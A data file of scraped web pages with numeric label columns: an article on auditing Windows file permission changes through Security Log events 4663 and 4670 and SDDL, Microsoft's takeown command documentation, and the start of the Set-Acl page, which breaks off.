-"Monitoring File Permission Changes with the Windows Security Log Actionable Security Intelligence by Netsurion About Netsurion About Netsurion Leadership News Careers EventTracker Awards EventTracker Testimonials EventTracker Press Releases Partners Partner Program Become a Partner Partner Portal Contact Us Schedule Demo Solutions Co-Sourcing SIEM When outsourcing isn\xe2\x80\x99t an option but SIEM proficiency is beyond the internal staff\xe2\x80\x99s expertise, a hybrid approach is essential. \xc2 Download the Report Solutions \xc2 Co-managed SIEM \xc2 Managed SIEM for MSPs \xc2 Managed EDR \xc2 SIEM Software \xc2 Centralized Log Management Advanced Threat Protection Capabilities EventTracker Essentials is a managed security solution delivering advanced threat protection and compliance for SMBs. \xc2 Download the Datasheet Capabilities \xc2 SIEM and Log Management \xc2 Threat Detection and Response \xc2 Vulnerability Assessment \xc2 User and Entity Behavior Analytics \xc2 Security Orchestration and Automation \xc2 Compliance Let's Go Threat Hunting: Gain Visibility and Insight into Potential Threats and Risks Industries Choosing the Right SIEM Find out how to cut through all the vendor hype and select the right solution for your environment and needs. \xc2 Download the Whitepaper Industries \xc2 Finance and Banking \xc2 Energy and Utilities \xc2 Legal \xc2 Higher Education \xc2 Government \xc2 Healthcare \xc2 Retail Bracing for the Tidal Wave of Data Privacy Compliance in America Knowledge Center Find out what it takes to operate a SOC and how your organization can get there fast, effectively, and affordably. \xc2 Download the Whitepaper Knowledge Center \xc2 Catch of the Day \xc2 Articles \xc2 Videos \xc2 Infographics \xc2 Whitepapers \xc2 Case Studies \xc2 Webcasts & Events View Recent Catches Support Strengthen your security defenses, respond effectively, control costs, and optimize your team's capabilities through SIEMphonic, a co-managed security solution. \xc2 Catch More Threats Support \xc2 Product Guides \xc2 Software Updates \xc2 Knowledge Packs \xc2 Online Help \xc2 Online Training \xc2 Customer Support Portal About ABOUT NETSURION LEADERSHIP NEWS CAREERS EVENTTRACKER AWARDS EVENTTRACKER TESTAMONIALS EVENTTRACKER PRESS RELEASES Partners PARTNER PROGRAM BECOME A PARTNER PARTNER PORTAL Contact Us Schedule Demo Close Articles Monitoring File Permission Changes with the Windows Security Log \xc2 February 19, 2014 \xc2 Security Unstructured data access governance is a big compliance concern.\xc2 Unstructured data is difficult to secure because there\xe2\x80\x99s so much of it, it\xe2\x80\x99s growing so fast and it is user created so it doesn\xe2\x80\x99t automatically get categorized and controlled like structured data in databases.\xc2 Moreover unstructured data is usually a treasure trove of sensitive and confidential information in a format that bad guys can consume and understand without reverse engineering the relationship of tables in a relational database. Most of this unstructured data is still found on file shares throughout the network, and file system permissions are the main control over this information.\xc2 Therefore knowing when permissions change unstructured is critical to governance and control. File permissions should normally be fairly static but end-users are (by default) the owner of files and subfolders they create and can therefore change permissions on those files. And of course, administrators can change permissions on any object.\xc2 Either way you need to know when this happens. Here\xe2\x80\x99s how to do it with the Windows Security Log. First we need to enable the File System audit subcategory.\xc2 You\xe2\x80\x99ll find this in any group policy object under Computer Configuration\\Windows Settings\\Security Settings\\Advanced Audit Policy Configuration\\System Audit Policies\\Object Access.\xc2 Enable File System for success.\xc2 (By the way, make sure you also enable Computer Configuration\\Windows Settings\\Security Settings\\Local Policies\\Security Options\\Audit: Force audit policy subcategory settings to override audit policy category settings to make sure your audit policy takes effect.) Now you need to enable object level auditing on the root folders containing your unstructured data.\xc2 For example, if you have a shared folder called c:\\files, go to that folder in Windows Explorer, open the security tab of the folders properties, click Advanced and select the Auditing tab.\xc2 Now add an entry for Everyone that enables successful use of the Change permissions as shown below. At this point Windows will begin generating two events each time you change permissions on this folder or any of its subfolders or files.\xc2 One event is the standard event ID 4663, \xe2\x80\x9cAn attempt was made to access an object\xe2\x80\x9d, which is logged for any kind of audited file access like read, write, delete, etc.\xc2 That event will show WRITE_DAC under the Access Request Information but it doesn\xe2\x80\x99t tell you what the actual permission change was. \xc2 So instead, use event ID 4670, \xe2\x80\x9cPermissions on an object were changed\xe2\x80\x9d, which provides the before and after permissions of the object under Permissions Change as shown in the example below. \xe2\x80\x9cWhat does D:AI(A;ID;FA;;;AU)(A;ID;FA;;;WD)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU) mean?\xe2\x80\x9d This is the original access control list of asdf.txt but in the very cryptic Security Descriptor Definition Language (SDDL).\xc2 SDDL definitely isn\xe2\x80\x99t something you want to manually parse and translate on a regular basis, but you can when necessary. Look for the \xe2\x80\x9cD:\xe2\x80\x9d which is close to the beginning of the string or even the very beginning in this case.\xc2 \xe2\x80\x9cD:\xe2\x80\x9d means Discretionary Access Control List (DACL) which are the actual permissions on the object as opposed to other things that show up in a security descriptor \xe2\x80\x93 like owner, primary group and the audit policy (aka SACL).\xc2 Until you hit another letter-colon combination like \xe2\x80\x9cS:\xe2\x80\x9d you are looking at the object\xe2\x80\x99s permissions.\xc2 An ACL is made up of Access Control Entries which correspond to each item in the list you see in the Permissions tab of an object\xe2\x80\x99s properties dialog.\xc2 But in SDDL before listing the ACEs comprising the ACL you will see any flags that affect the entire ACL as a whole.\xc2 In the example above you see AI as the first element after D:.\xc2 AI stands for SDDL_AUTO_INHERITED which means permissions on parent objects are allowed to propagate down to this object. Now come the ACEs.\xc2 In SDDL, each ACE is surrounded by parenthesis and the fields within it delimited by semicolons.\xc2 The first ACE in the event above is (A;ID;FA;;;AU).\xc2 The first field tells you what type of ACE it is \xe2\x80\x93 either A for allow or D for deny.\xc2 The next field lists any ACE flags that specify whether this ACE is an inherited ACE prorogated down from a parent object and if and how this ACE should propagate down to child objects.\xc2 The only flag in this ACE is ID which means the ACE is in fact inherited.\xc2 The next field lists the permissions this ACE allows or denies.\xc2 In this example FA stands for all file access rights.\xc2 The next 2 fields, Object Type and Inherited Object Type,\xc2 are always blank on file system permissions (hence the 3 semicolons in a row); they are only used places like Active Directory where there are different types of objects (user, group, computer, etc) that you can define permissions for.\xc2 Finally, the last field is Trustee and identifies the user, group or special principal begin allowed or denied access.\xc2 Here you will either see the SID of the user or group if the ACE applies to a so-called \xe2\x80\x9cwell-known\xe2\x80\x9d SID you\xe2\x80\x99ll the corresponding acronym.\xc2 In this example AU stands for Authenticated Users. Event ID 4670 does a great job of alerting you when permissions change on an object and telling you which object was affected and who did it.\xc2 To go further and understand what permissions where actually changed you have to dive into SDDL.\xc2 I recommend Ned Pyle\xe2\x80\x99s 2-part TechNet blog, The Security Descriptor Definition Language of Love for more information on SDDL. Share: Recent Posts Best Practices to Halt Insider Threats Coordinated Ransomware Attacks Hit Resource-Constrained Municipalities Mitigate Software Supply Chain Attacks with SIEM and EDR 7 Things IT Pros Should Know about HIPAA and Protecting Patient Data IT Security: How Much Should You Spend? Blog posts RSS This site uses cookies to store information on your computer. Some are essential to make our site work; others help us improve the user experience. By using the site, you consent to the placement of these cookies. Read our Privacy Statement to learn more. I Accept See EventTracker in action! Join our next live demo October 1st at 2:00 p.m. EST. Register Here EventTracker.com About Netsurion Leadership Awards & Recognition Careers Articles Upcoming Events Press Releases Partner Portal Contact us Toll Free: 877.333.1433 Tel: +1 410.953.6776 Support Toll Free: 877.333.1433 Ext.2 Tel: +1 410.953.6776 Ext.2 EventTracker SOC/SIEMphonic Toll Free: 877.333.1433 Ext.3 Tel: +1 410.953.6776 Ext.3 Subscribe Now Stay informed with our monthly newsletter \xc2\xa9 Copyright EventTracker. All Rights Reserved. Privacy Terms of Use Sitemap Contact Us","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"takeown | Microsoft Docs Skip to main content Contents Exit focus mode Feedback Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents takeown 10/16/2017 2 minutes to read In this article Enables an administrator to recover access to a file that previously was denied, by making the administrator the owner of the file. For examples of how to use this command, see Examples. Syntax takeown [/s [/u [\\] [/p []]]] /f [/a] [/r [/d {Y|N}]] Parameters Parameter Description /s Specifies the name or IP address of a remote computer (do not use backslashes). The default value is the local computer. This parameter applies to all of the files and folders specified in the command. /u [] Runs the script with the permissions of the specified user account. The default value is system permissions. /p [] Specifies the password of the user account that is specified in the /u parameter. /f Specifies the file name or directory name pattern. You can use the wildcard character * when specifying the pattern. You can also use the syntax ShareName*FileName*. /a Gives ownership to the Administrators group instead of the current user. /r Performs a recursive operation on all files in the specified directory and subdirectories. /d {Y | N} Suppresses the confirmation prompt that is displayed when the current user does not have the ""List Folder"" permission on a specified directory, and instead uses the specified default value. Valid values for the /d option are as follows: - Y: Take ownership of the directory.- N: Skip the directory. Note that you must use this option in conjunction with the /r option. /? Displays help at the command prompt. Remarks This command is typically used in batch files. If the /a parameter is not specified, file ownership is given to the user who is currently logged on to the computer. Mixed patterns using (? and *) are not supported by takeown command. After deleting the lock with takeown, you might have to use Windows Explorer or the cacls command to give yourself full permissions to the files and directories before you can delete them. For more information about cacls, see ""Additional references"" at the end of this topic. Examples To take ownership of a file named Lostfile, type: takeown /f lostfile Additional references Command-Line Syntax Key Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. Feedback Send feedback about This product This page You may also leave feedback directly on GitHub . This page You may also leave feedback directly on GitHub . Liquid error: Can't find the localized string giveDocumentationFeedback for template Conceptual. Issue Title Leave a comment Submit feedback Loading feedback... There are no open issues There are no closed issues View on GitHub Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Set-Acl Skip to main content Contents Exit focus mode Feedback Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents Set-Acl Module: Microsoft.PowerShell.Security Changes the security descriptor of a specified item, such as a file or a registry key. In this article Syntax Set-Acl [-Path] [-AclObject]